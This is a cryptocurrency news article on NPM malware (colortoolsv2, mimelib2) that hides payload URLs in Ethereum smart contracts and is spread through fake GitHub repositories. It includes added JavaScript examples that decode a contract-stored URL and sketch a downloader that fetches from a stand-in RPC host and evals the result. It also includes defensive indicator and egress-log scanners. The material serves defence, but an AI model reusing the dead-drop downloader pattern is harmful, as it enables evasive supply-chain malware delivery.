
New Ethereum Smart Contract Malware Discovered

Attackers have found a new place to stash the addresses of their malware payloads: Ethereum smart contracts. By reading command-and-control URLs out of a blockchain instead of shipping them inside the package, they turn traffic that security tooling treats as legitimate into a covert delivery channel.

Key Takeaways

  • Ethereum smart contracts are being used to hide malicious URLs, making them harder to detect.

  • The malware packages (colortoolsv2 and mimelib2) were hosted on NPM and appeared legitimate.

  • Requests to Ethereum RPC nodes look like ordinary wallet or dApp traffic, so network and endpoint tooling rarely flags them.

  • Fake GitHub repositories were used in a coordinated social engineering campaign.

  • This trend marks a shift in malware tactics targeting Web3 infrastructure and open-source software.


How Ethereum Smart Contracts Are Being Exploited

Malicious NPM Packages Uncovered

ReversingLabs researchers revealed that two NPM packages, colortoolsv2 and mimelib2, published in July 2025, were designed to use Ethereum smart contracts to hide and retrieve the URLs from which their second-stage malware payloads were downloaded.

Image: NPM packages ‘colortoolsv2’ & ‘mimelib2’ on GitHub (Source: ReversingLabs)

Instead of hardcoding malicious URLs into the packages, the malware queried Ethereum smart contracts at run time to obtain its command-and-control (C2) server addresses. Neither the URLs nor the payload are present in the published package, which makes detection by conventional scanning tools significantly more difficult.

Why This Technique Works

To a network sensor, a query to a smart contract is just a JSON-RPC request to an Ethereum node over HTTPS, indistinguishable from a wallet or dApp checking a balance, so it is treated as legitimate traffic and goes unnoticed by traditional intrusion detection systems. The technique also gives the operator agility: if the contract exposes a setter, the payload URL can be rotated by updating the contract's state, with no need to republish the package.

Once installed, the malicious packages acted as lightweight downloaders, initiating communication with the blockchain to retrieve hidden instructions.
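The following is an added example to illustrate the mechanism described above; it is not code from the ReversingLabs report or from the colortoolsv2 and mimelib2 packages. It shows how a downloader turns the result of an `eth_call` (an ABI-encoded `string` returned by a contract) into a URL, and why a scanner that looks for hardcoded URLs in the package finds nothing while a scanner keyed on the technique itself does. The contract address, function selector, RPC endpoint, payload URL and the sketched package source are all constructed placeholders.

```javascript
// Added example, not code from the ReversingLabs report or from the colortoolsv2 /
// mimelib2 packages. Contract address, selector, RPC endpoint and payload URL are
// constructed placeholders (.invalid / .example names never resolve).

// A Solidity function returning `string` ABI-encodes it as three parts:
// [offset to data = 0x20][byte length][UTF-8 bytes, right-padded to 32 bytes].
function abiEncodeString(str) {
  const bytes = Buffer.from(str, "utf8");
  const word = (n) => n.toString(16).padStart(64, "0");
  const pad = Buffer.alloc((32 - (bytes.length % 32)) % 32);
  return "0x" + word(32) + word(bytes.length) + Buffer.concat([bytes, pad]).toString("hex");
}

// Decode that layout back into a string. This is all a downloader needs, so it
// can avoid pulling in web3/ethers and keep its dependency list unremarkable.
function abiDecodeString(hex) {
  const data = Buffer.from(hex.replace(/^0x/, ""), "hex");
  if (data.length < 64) throw new Error("too short for an ABI-encoded string");
  const readWord = (at) => Number(BigInt("0x" + data.subarray(at, at + 32).toString("hex")));
  const offset = readWord(0);
  const length = readWord(offset);
  const start = offset + 32;
  if (start + length > data.length) throw new Error("declared length exceeds payload");
  return data.subarray(start, start + length).toString("utf8");
}

// Constructed stand-in for the JSON-RPC reply to eth_call; a real downloader
// would POST {"method":"eth_call","params":[{to, data},"latest"]} to an RPC node.
const CONTRACT_ADDRESS = "0x" + "ab".repeat(20);          // placeholder address
const STAGE2_URL = "https://payload.example/stage2.js";  // placeholder payload URL
const FAKE_RPC_REPLY = { jsonrpc: "2.0", id: 1, result: abiEncodeString(STAGE2_URL) };

// What the downloader does with the reply: the URL materialises only at run time.
function resolveStage2Url(rpcReply) {
  if (rpcReply.error) throw new Error("RPC error: " + JSON.stringify(rpcReply.error));
  return abiDecodeString(rpcReply.result);
}

// Constructed sketch of what such a package's source looks like. Note what is
// absent: the payload URL. Only an RPC endpoint and a contract address appear.
const DOWNLOADER_SOURCE = `
const body = JSON.stringify({ jsonrpc: "2.0", id: 1, method: "eth_call",
  params: [{ to: "${CONTRACT_ADDRESS}", data: "0xdeadbeef" }, "latest"] });
fetch("https://rpc.example-node.invalid", { method: "POST", body })
  .then(r => r.json())
  .then(j => fetch(decode(j.result)))
  .then(r => r.text())
  .then(code => eval(code));
`;

// A URL-blocklist style scan: finds only the RPC endpoint, never the payload URL.
function findUrls(src) {
  return src.match(/https?:\/\/[^\s"'`)]+/g) || [];
}

// An indicator scan keyed on the technique rather than on URLs.
const INDICATORS = [
  ["json-rpc eth_call / storage read", /\beth_(call|getStorageAt)\b/],
  ["ethereum address literal", /\b0x[0-9a-fA-F]{40}\b/],
  ["dynamic code execution", /\b(eval|Function)\s*\(|child_process|vm\.runIn/],
  ["fetch of decoded remote content", /fetch\(\s*\w+\(/],
];
function indicatorScan(src) {
  return INDICATORS.filter(([, re]) => re.test(src)).map(([name]) => name);
}

console.log("stage-2 URL resolved at run time:", resolveStage2Url(FAKE_RPC_REPLY));
console.log("URLs visible to a static scan:", findUrls(DOWNLOADER_SOURCE));
console.log("technique indicators:", indicatorScan(DOWNLOADER_SOURCE));
```

Running it with Node shows the payload URL appearing only after the ABI decode, a single benign-looking RPC endpoint in the source, and all four indicators firing. In practice the indicator list is what a package-review pipeline should key on: a colour or MIME utility has no business performing `eth_call` and then executing what it fetched.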

ReversingLabs researcher Lucija Valentić said:

“What is new and different is the use of Ethereum smart contracts to host the URLs where malicious commands are located.”

Social Engineering Meets Blockchain

GitHub Repositories As Deceptive Fronts

These malware packages weren’t isolated threats; they were part of a larger deception campaign. The attackers set up fake GitHub repositories that mimicked legitimate cryptocurrency trading bots and listed the malicious packages as dependencies.

Tactics used to build trust included:

  • Fabricated code commits

  • Fake user accounts to simulate popularity

  • Multiple maintainer profiles

  • Professional-looking documentation

These repositories lured developers into downloading and integrating malicious packages into their projects, unknowingly exposing themselves to malware.

Trolling The Open Source Community

This attack strategy reveals a troubling trend: open-source repositories are becoming attack surfaces.

As developers increasingly rely on packages from NPM, GitHub, and other open repositories, threat actors are embedding themselves in the supply chain.

Not The First, But Definitely The Most Sophisticated

Previous Blockchain Malware Incidents

Ethereum smart contract malware isn’t entirely new. The infamous Lazarus Group, believed to be linked to North Korea, used similar techniques earlier in 2024.

However, this latest approach introduces a new level of stealth and complexity.

Other blockchain ecosystems have also been targeted:

  • Solana: A fake GitHub repository posed as a Solana trading bot and delivered obfuscated malware to steal wallet credentials.

  • Bitcoinlib: Malicious Python packages posing as fixes for the legitimate bitcoinlib library were uploaded to PyPI; once installed, they replaced its command-line tool with code that stole wallet files and private keys.

Image: The now-deleted fake GitHub repository (Source: SlowMist)

A Growing Threat To Web3 Security

In 2024 alone, ReversingLabs documented 23 malicious campaigns targeting crypto-related open-source repositories. This new use of Ethereum smart contract malware shows that attackers are continuously refining their tactics.

Traditional malware detection often assumes that malicious URLs will be hardcoded in the package or fetched from known-bad domains. By offloading the URLs to the Ethereum blockchain, attackers defeat both: static analysis finds no URL to flag, and dynamic analysis sees only a read-only JSON-RPC query to a blockchain node, whose answer can be changed by the operator at any time.

Valentić warned:

“It highlights the fast evolution of detection evasion strategies by malicious actors who are trolling open source repositories and developers.”

FAQ

What is Ethereum smart contract malware?

Ethereum smart contract malware is malware that uses a smart contract as a dead drop. The contract does not run the malicious code itself; it stores data the malware needs, in this case the URLs of payload servers, which the malware reads from the blockchain at run time to evade detection by traditional cybersecurity tools.

How did the attackers use Ethereum smart contracts in this case?

The attackers embedded URLs inside smart contracts. The infected NPM packages queried the blockchain to fetch these URLs, which were then used to download the actual malware.

Why is this technique effective?

Because the query is a TLS-encrypted JSON-RPC request to a blockchain node, it looks like normal wallet or dApp traffic and passes firewalls and URL filtering, which only see the RPC endpoint. The payload URL itself never appears in the package or on the wire in clear text, so static scanners and blocklists have nothing to match.

What can developers do to protect themselves?

  • Use package auditing tools such as Snyk or npm audit, but treat them as a floor: they flag known advisories, not brand-new malicious packages, so also check a package's age, download history and maintainer record before adopting it

  • Verify the credibility of GitHub repositories before use; inflated stars, freshly created maintainer accounts and commit histories made of trivial edits are warning signs

  • Restrict and monitor outbound traffic from developer, build and CI hosts; a dependency with no blockchain purpose has no reason to contact an Ethereum RPC node

  • Keep security software up to date
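To make the egress-monitoring advice concrete, here is an added example (not part of the original article or the ReversingLabs research) that reviews egress-proxy logs for JSON-RPC read calls to blockchain nodes coming from hosts that should never need them, such as CI runners and build agents. The log format, hostnames, RPC endpoint and sample entries are constructed for the example; the proxy is assumed to terminate TLS so the POST body is visible.

```javascript
// Added example, not part of the original article or the ReversingLabs research.
// Reviews egress-proxy logs for JSON-RPC calls to blockchain nodes coming from
// hosts that should never need them (CI runners, build agents). Hostnames, log
// format and the sample lines below are constructed for the example.

// JSON-RPC methods a dead-drop downloader needs: read contract state or call a view function.
const RPC_READ_METHODS = new Set(["eth_call", "eth_getStorageAt", "eth_getLogs", "eth_getCode"]);

// Hosts that legitimately talk to chains (constructed: one wallet-development workstation).
const RPC_ALLOWED_SOURCES = new Set(["dev-wallet-01"]);

// Constructed proxy log: one JSON object per line with the POST body captured
// at the TLS-terminating proxy. Without TLS termination only dst_host is visible.
const SAMPLE_PROXY_LOG = [
  { ts: "2025-09-03T10:01:02Z", src_host: "ci-runner-07", dst_host: "registry.npmjs.org",
    path: "/colortoolsv2", body: "" },
  { ts: "2025-09-03T10:01:09Z", src_host: "ci-runner-07", dst_host: "rpc.example-node.invalid",
    path: "/", body: JSON.stringify({ jsonrpc: "2.0", id: 1, method: "eth_call",
      params: [{ to: "0x" + "ab".repeat(20), data: "0xdeadbeef" }, "latest"] }) },
  { ts: "2025-09-03T10:03:44Z", src_host: "dev-wallet-01", dst_host: "rpc.example-node.invalid",
    path: "/", body: JSON.stringify({ jsonrpc: "2.0", id: 7, method: "eth_call",
      params: [{ to: "0x" + "cd".repeat(20), data: "0x70a08231" }, "latest"] }) }, // wallet-app query
  { ts: "2025-09-03T10:05:10Z", src_host: "build-agent-02", dst_host: "rpc.example-node.invalid",
    path: "/", body: JSON.stringify({ jsonrpc: "2.0", id: 2, method: "eth_getStorageAt",
      params: ["0x" + "ef".repeat(20), "0x0", "latest"] }) },
  { ts: "2025-09-03T10:06:00Z", src_host: "build-agent-02", dst_host: "rpc.example-node.invalid",
    path: "/", body: "not json" },
].map((e) => JSON.stringify(e)).join("\n");

// Pull the JSON-RPC method and target contract out of a request body, if it is one.
// eth_call carries the contract in params[0].to; storage/code reads carry it as params[0].
function parseJsonRpc(body) {
  try {
    const msg = JSON.parse(body);
    if (!msg || typeof msg.method !== "string") return null;
    const first = Array.isArray(msg.params) ? msg.params[0] : undefined;
    const contract = typeof first === "string" ? first : first && first.to;
    return { method: msg.method, contract: typeof contract === "string" ? contract.toLowerCase() : null };
  } catch {
    return null;
  }
}

// Flag chain reads from non-allowlisted hosts; return findings plus the contract
// addresses seen, which can feed a blocklist or a threat-intel lookup.
function flagBlockchainEgress(logText, allowedSources = RPC_ALLOWED_SOURCES) {
  const findings = [];
  for (const line of logText.split("\n")) {
    if (!line.trim()) continue;
    const entry = JSON.parse(line);
    const rpc = parseJsonRpc(entry.body);
    if (!rpc || !RPC_READ_METHODS.has(rpc.method)) continue;
    if (allowedSources.has(entry.src_host)) continue;
    findings.push({ ts: entry.ts, src_host: entry.src_host, dst_host: entry.dst_host,
      method: rpc.method, contract: rpc.contract });
  }
  const contracts = [...new Set(findings.map((f) => f.contract).filter(Boolean))];
  return { findings, contracts };
}

const report = flagBlockchainEgress(SAMPLE_PROXY_LOG);
for (const f of report.findings) {
  console.log(`${f.ts} ${f.src_host} -> ${f.dst_host} ${f.method} ${f.contract}`);
}
console.log("contracts to investigate:", report.contracts);
```

On the sample log this reports two findings (the CI runner's `eth_call` and the build agent's `eth_getStorageAt`) and two contract addresses to investigate, while the wallet workstation's query is allowed through. The stronger control is the one the allowlist implies: build and CI hosts should have no route to Ethereum RPC endpoints at all, so that the downloader fails before it can learn where its payload lives.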

Is this only happening on Ethereum?

No. Similar tactics have been observed on other blockchains like Solana and Bitcoin, indicating a broader trend across the crypto ecosystem.

Tags: Blockchain, Ethereum, Malware, Security, Smart Contract


Haider Jamal

Content Strategist

Haider is a fintech enthusiast and Content Strategist at CryptoWeekly with over four years in the Crypto & Blockchain industry. He began his writing journey with a blog after graduating from Monash University Malaysia. Passionate about storytelling and content creation, he blends creativity with insight. Haider is driven to grow professionally while always seeking the next big idea.
